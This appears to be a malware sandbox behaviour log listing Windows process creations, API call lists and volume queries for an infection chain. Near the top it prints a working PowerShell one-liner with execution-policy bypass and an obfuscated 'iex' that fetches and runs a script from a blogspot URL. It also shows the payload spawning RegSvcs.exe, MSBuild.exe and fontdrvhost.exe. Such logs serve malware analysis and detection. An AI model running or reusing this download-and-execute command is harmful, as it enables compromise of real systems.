Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 936
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 920
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 764
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;& ('{1}{0}' -f 'ex', 'i') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);start-sleep -seconds 6;
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;& ('{1}{0}' -f 'ex', 'i') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);start-sleep -seconds 6;			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 19_2_05886E83 _snwprintf,_snwprintf,OpenMutexW,OpenMutexW,_snwprintf,OpenMutexW,GetCurrentProcessId,ProcessIdToSessionId,InitializeSecurityDescriptor,_snwprintf,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexW,GetLastError,_snwprintf,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexW,GetLastError,CloseHandle,

19_2_05886E83

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 19_2_0588440E calloc,memset,GetCurrentProcess,LoadLibraryW,GetModuleFileNameW,rand,free,memset,rand,free,free,VirtualProtect,VirtualProtect,GetCurrentProcess,FlushInstructionCache,time,srand,CreateEventW,rand,strtok,strtok,_mbsdup,free,_mbsdup,CreateTimerQueue,GetCurrentProcess,OpenProcessToken,AllocateAndInitializeSid,EqualSid,RtlConvertSidToUnicodeString,FreeSid,free,CloseHandle,GetCurrentProcessId,rand,memset,CreateTimerQueueTimer,free,WaitForSingleObject,DeleteTimerQueueEx,CloseHandle,calloc,RtlAllocateHeap,HeapFree,GetProcessHeap,VirtualFree,strlen,free,free,free,

19_2_0588440E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Queries volume information: C:\ VolumeInformation

